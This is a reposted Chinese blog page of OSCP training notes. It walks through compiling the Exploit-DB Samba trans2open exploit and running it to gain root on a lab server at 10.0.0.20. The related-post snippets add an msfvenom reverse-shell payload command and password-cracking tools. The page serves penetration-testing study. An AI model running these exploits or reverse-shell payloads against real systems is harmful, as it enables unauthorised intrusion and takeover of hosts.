OSCP Learning Notes - Exploit(2)

最新推荐文章于 2025-08-14 19:51:53 发布
最新推荐文章于 2025-08-14 19:51:53 发布
阅读量144 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库
原文链接:http://www.cnblogs.com/keepmoving1113/p/11143589.html
本文详细介绍了如何从Exploit Database下载Samba漏洞源代码,并使用gcc进行编译。随后,通过trans2open工具成功利用目标服务器,实现root权限获取。整个过程涵盖了漏洞搜索、源代码编译到实际攻击的完整步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Compiling an Exploit

Exercise: samba exploit

1. Search and download the samba exploit source code from Exploit Database.

https://www.exploit-db.com/exploits/10

2. Compile the source code.

gcc 10.c -o trans2open

 

 

3. Use the trans2open tool to exploit the target server. Root the target server sucessfully.

 

./trans2open -b 0 10.0.0.20

 

 

转载于:https://www.cnblogs.com/keepmoving1113/p/11143589.html

javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
OSCP Learning Notes - Exploit(4)
weixin_30883777的博客
07-07 102
Client Side Attacks Tool: setoolkit 1. Start setoolkit on Kali Linux. setoolkit 2. Select 1) Social-Engineering Attacks 3. Select 2)Website Attack Vectors. 4. Select 2) Metasploit Brow...
OSCP Learning Notes - Exploit(3)
weixin_30781107的博客
07-06 198
Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website: http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/ #!/usr/bin/python ...
OSCP Learning Notes - Exploit(1)
weixin_30607029的博客
07-06 207
Gaining Root with Metasploit Platform: Kali Linux, Kioptrix Level 1 1. Find the IP of Kioptirx nmap 10.0.0.0/24 -n -sP -sn 2. Scan the Kioptrix server and analyst the result. nmap -nvv -P...
OSCP Learning Notes - Exploit(7)
weixin_30294021的博客
07-16 172
Pre-Exploit Password Attacks Tools: 1. ncrack Ncrack 0.6 ( http://ncrack.org )Usage: ncrack [Options] {target and service specification}TARGET SPECIFICATION: Can pass hostnames, IP addresses, netw...
OSCP Learning Notes - Exploit(8)
weixin_30783913的博客
07-16 261
Tools: 3. hydra Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE...
OSCP Learning Notes - Exploit(6)
weixin_30840573的博客
07-16 107
Antivirus Bypassing Tools: Kali Linux Detection Platform:https://www.virustotal.com/gui/home/upload 1. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -o shell1.exe ...
OSCP Learning Notes - Exploit(9)
weixin_30552811的博客
07-16 117
Tool: Metasploit 1. Start the msfconsole tool. msfconsole 2.Search ssh related modules. 3.Use the "auxiliary/scanner/ssh/ssh_login" module and set the options, such as pass_file, rhost...
OSCP Learning Notes - Scanning(2)
weixin_30756499的博客
06-22 156
Scanning with Metasploite: 1. Start the Metasploite using msfconsole 2. search modules 3.Choose one of the modules using command: use + module name 4. Show the module options 5.Set t...
OSCP Learning Notes - Capstone(2)
weixin_30478923的博客
08-04 234
BTRSys v2.1 Walkthrough Preparation: Download theBTRSys virtual machine from the following website: https://www.vulnhub.com/entry/btrsys-v21,196/ 1. Find the IP address of the BTRSys virtual...
java红酒网站源码-OSCP-PWK-Notes-Public:Optixal的进攻性安全认证专家(OSCP)/KaliLinux(PWK)
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-oscp-notes:oscp-notes
06-05
apache2 在启动时启动服务systemctl enable ssh 停止服务systemctl stop ssh 解压一个gz文件gunzip access.log.gz 解压 tar.gz 文件tar -xzvf file.tar.gz 搜索命令历史history | grep phrase_to_search_for 下载...
MoonBit Perals Vol.05: 函数式里的依赖注入:Reader Monad
m0_74743788的博客
08-13 545
普通的函数就像一个流水线,你丢进去一袋面粉,然后直接跑到生产线末端,等着方便面出来。但这条流水线需要自动处理中间的所有复杂情况:没放面粉/“没有下单,期待发货”(null)面团含水量不够把压面机干卡了(抛出异常)配料机需要读取今天的生产配方,比如是红烧牛肉味还是香菇炖鸡味(读取外部配置)流水线末端的打包机需要记录今天打包了多少包(更新计数器)Monad 就是专门管理这条复杂流水线的“总控制系统”。它把你的数据和处理流程的上下文一起打包,确保整个流程能顺畅、安全地进行下去。
SQL进阶-学习路线梳理(一)
xfzldxfz的博客
08-13 538
本文档是MySQL 8.0+的SQL学习指南,内容涵盖从基础到进阶的完整知识体系。主要包含SQL基础概念、数据类型与约束、CRUD操作、函数、表连接、分组聚合、子查询、窗口函数等核心语法,以及索引优化、事务锁机制、存储过程、触发器、视图等高级特性。特别介绍了MySQL 8.0的新功能如CTE、JSON数据处理等,并提供了数据库设计、性能优化、安全管理、备份恢复等实战经验。文档强调生产环境验证的重要性,建议根据实际业务场景调整SQL语句,并定期关注MySQL官方更新。
达梦数据库报错-2103:无效的模式名[DAMENG]
染落林间色的博客
08-11 286
摘要:文章提示"报错-2103:无效的模式名[DAMENG]",解决方案是直接去掉模式名中的"DAMENG"即可。该问题是由于使用了无效的模式名导致的,简单的删除操作就能解决这个错误。
Mysql数据库迁移到GaussDB注意事项
qq_40919128的博客
08-13 257
adddate ('1970-01-01',t4.i * 10000 + t3.i * 1000 + t2.i * 100 + t1.i * 10 + t0.i ) 改为DATE '1970-01-01' + INTERVAL '1 day' * (t4.i * 10000 + t3.i * 1000 + t2.i * 100 + t1.i * 10 + t0.i)3:xml中sql模糊匹配,拼接时不可以使用"%",只可以使用'%'4:使用汉字做别名,不能使用'别名',只能使用"别名"
构建轻量级Flask Web框架:从入门到实践
qq_43580271的博客
08-11 368
本文介绍了如何从零开始构建一个轻量级但功能完备的Flask框架。Flask作为Python生态中的微框架,具有简洁灵活、可扩展的特点。文章详细讲解了项目结构设计、核心功能实现和扩展方法,包括配置管理、应用工厂模式、路由设计、模板系统等基础功能,以及数据库集成、用户认证、REST API开发等高级功能扩展。同时提供了生产环境部署实践和性能优化建议。通过模块化设计和渐进式增强,该框架既能快速开发小型项目,又能扩展支持大型应用需求,是Flask开发的实用指南。
PostgreSQL 免安装
最新发布
hongsegeming的博客
08-14 46
本文介绍了EDB(EnterpriseDB)PostgreSQL数据库管理系统的安装与基本操作。下载解压后,需在指定目录(如D:\postgresql)创建data文件夹存放数据。通过bin目录下的initdb命令初始化数据库,设置UTF-8编码和postgres用户。使用pg_ctl命令启动/停止数据库服务,psql命令连接数据库。这些步骤为Windows系统下PostgreSQL的快速部署提供了简明指南。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-优快云博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值